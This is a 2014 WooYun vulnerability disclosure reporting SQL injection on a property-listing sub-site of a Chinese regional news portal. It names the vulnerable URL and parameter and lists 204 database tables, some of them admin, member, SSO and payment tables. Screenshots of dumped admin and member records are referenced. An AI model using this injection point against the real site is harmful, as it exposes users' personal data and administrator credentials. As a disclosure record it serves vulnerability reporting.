Vulnerability summary

Defect ID: wooyun-2014-075798

Title: SQL injection vulnerability on a sub-site of Yanzhao Dushi Wang (燕赵都市网)

Vendor: Yandu Wang (燕都网)

Author: 新生

Submitted: 2014-09-11 17:36

Fix deadline: 2014-10-26 17:38

Published: 2014-10-26 17:38

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-09-11: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-10-26: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection vulnerability that leaks a large amount of member information

Detailed description:

Injection point (vulnerable parameter: f)
http://loupan.house.yzdsb.com.cn/?a=search&f=&s=&p=&e=&t=&r=&h=&d=&w=

dbs.jpg (screenshot of the enumerated databases)


Database: inchyzdsbdb
[204 tables]
+------------------------------------+
| inch_ask_answer |
| inch_ask_askcat |
| inch_ask_question |
| inch_ask_qutags |
| inch_ask_tags |
| inch_ask_tpdata |
| inch_ask_tpjiangpin |
| inch_ask_tpzuopin |
| inch_ask_zjt |
| inch_ask_ztq |
| inch_cms_admin |
| inch_cms_admin_panel |
| inch_cms_admin_role |
| inch_cms_admin_role_priv |
| inch_cms_announce |
| inch_cms_attachment |
| inch_cms_attachment_index |
| inch_cms_badword |
| inch_cms_bbs |
| inch_cms_bbs_data |
| inch_cms_block |
| inch_cms_block_history |
| inch_cms_block_priv |
| inch_cms_cache |
| inch_cms_category |
| inch_cms_category_priv |
| inch_cms_collection_content |
| inch_cms_collection_history |
| inch_cms_collection_node |
| inch_cms_collection_program |
| inch_cms_comment |
| inch_cms_comment_check |
| inch_cms_comment_data_1 |
| inch_cms_comment_setting |
| inch_cms_comment_table |
| inch_cms_content_check |
| inch_cms_copyfrom |
| inch_cms_datacall |
| inch_cms_dbsource |
| inch_cms_download |
| inch_cms_download_data |
| inch_cms_downservers |
| inch_cms_duobiaoti |
| inch_cms_duobiaoti_data |
| inch_cms_extend_setting |
| inch_cms_favorite |
| inch_cms_form_biaodan_jiahe |
| inch_cms_form_ddd |
| inch_cms_form_diaocha2014 |
| inch_cms_form_diaocha3 |
| inch_cms_form_diaochaweijuan |
| inch_cms_form_hengdahaoshengyin |
| inch_cms_form_jidongche1 |
| inch_cms_form_jjysddc |
| inch_cms_form_jxss |
| inch_cms_form_loushiditu |
| inch_cms_form_milanchuntianbaoming |
| inch_cms_form_mlzj |
| inch_cms_form_qzrjfhxss |
| inch_cms_form_tatantuangou |
| inch_cms_form_tejiafang |
| inch_cms_form_xxdashi |
| inch_cms_form_xzldiaocha |
| inch_cms_form_zhishu |
| inch_cms_hits |
| inch_cms_ipbanned |
| inch_cms_keylink |
| inch_cms_link |
| inch_cms_linkage |
| inch_cms_log |
| inch_cms_member |
| inch_cms_member_agent |
| inch_cms_member_detail |
| inch_cms_member_group |
| inch_cms_member_menu |
| inch_cms_member_verify |
| inch_cms_member_vip |
| inch_cms_menu |
| inch_cms_message |
| inch_cms_message_data |
| inch_cms_message_group |
| inch_cms_model |
| inch_cms_model_field |
| inch_cms_module |
| inch_cms_mood |
| inch_cms_news |
| inch_cms_news_data |
| inch_cms_page |
| inch_cms_pay_account |
| inch_cms_pay_payment |
| inch_cms_pay_spend |
| inch_cms_picture |
| inch_cms_picture_data |
| inch_cms_plugin |
| inch_cms_plugin_var |
| inch_cms_position |
| inch_cms_position_data |
| inch_cms_poster |
| inch_cms_poster_201210 |
| inch_cms_poster_201211 |
| inch_cms_poster_201212 |
| inch_cms_poster_201301 |
| inch_cms_poster_201304 |
| inch_cms_poster_201306 |
| inch_cms_poster_201307 |
| inch_cms_poster_201308 |
| inch_cms_poster_201309 |
| inch_cms_poster_201310 |
| inch_cms_poster_201311 |
| inch_cms_poster_201312 |
| inch_cms_poster_201401 |
| inch_cms_poster_201403 |
| inch_cms_poster_201404 |
| inch_cms_poster_201406 |
| inch_cms_poster_201408 |
| inch_cms_poster_space |
| inch_cms_queue |
| inch_cms_release_point |
| inch_cms_search |
| inch_cms_search_keyword |
| inch_cms_session |
| inch_cms_site |
| inch_cms_sms_report |
| inch_cms_special |
| inch_cms_special_c_data |
| inch_cms_special_content |
| inch_cms_sphinx_counter |
| inch_cms_sso_admin |
| inch_cms_sso_applications |
| inch_cms_sso_members |
| inch_cms_sso_messagequeue |
| inch_cms_sso_session |
| inch_cms_sso_settings |
| inch_cms_tag |
| inch_cms_template_bak |
| inch_cms_times |
| inch_cms_topic |
| inch_cms_topic_data |
| inch_cms_type |
| inch_cms_urlrule |
| inch_cms_urlrule_bak28 |
| inch_cms_vote_data |
| inch_cms_vote_option |
| inch_cms_vote_subject |
| inch_cms_wap |
| inch_cms_wap_type |
| inch_cms_wj |
| inch_cms_workflow |
| inch_cms_zhibo |
| inch_cms_zhibo_data |
| inch_esf_attachment |
| inch_esf_estate |
| inch_esf_estate_image |
| inch_esf_house |
| inch_esf_sms |
| inch_esf_zu |
| inch_jiaju_activity |
| inch_jiaju_brand |
| inch_jiaju_brandtype |
| inch_jiaju_signup |
| inch_kft_intention |
| inch_kft_product |
| inch_kft_road |
| inch_kft_signup |
| inch_lp_estate |
| inch_lp_estate_autoupdata |
| inch_lp_estate_averageprice |
| inch_lp_estate_brand |
| inch_lp_estate_build |
| inch_lp_estate_clinch |
| inch_lp_estate_clinch_month |
| inch_lp_estate_clinch_week |
| inch_lp_estate_content |
| inch_lp_estate_content_bak |
| inch_lp_estate_developer |
| inch_lp_estate_distance |
| inch_lp_estate_duibi |
| inch_lp_estate_edifice |
| inch_lp_estate_hot |
| inch_lp_estate_image |
| inch_lp_estate_impression |
| inch_lp_estate_invester |
| inch_lp_estate_mark |
| inch_lp_estate_mark_distance |
| inch_lp_estate_params |
| inch_lp_estate_params_bak |
| inch_lp_estate_position |
| inch_lp_estate_position_data |
| inch_lp_estate_price |
| inch_lp_estate_price_month |
| inch_lp_estate_price_week |
| inch_lp_estate_property |
| inch_lp_estate_sign |
| inch_lp_estate_status |
| inch_lp_estate_subcity |
| inch_lp_estate_sync |
| inch_lp_estate_tag |
| inch_lp_estate_tip |
| inch_lp_estate_unit |
| sync_user_test |
| sys_t_param |
| sys_t_user |
| user |
| weixinchoujiang |
+------------------------------------+

inch_cms_admin表.jpg (screenshot of the inch_cms_admin table)

Proof of vulnerability:

inch_cms_admin数据.jpg (screenshot of inch_cms_admin data)

inch_cms_member数据.jpg (screenshot of inch_cms_member data)

inch_cms_sso_members数据.jpg (screenshot of inch_cms_sso_members data)

Remediation:

Copyright notice: when reposting, credit the source as 新生@乌云


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively declined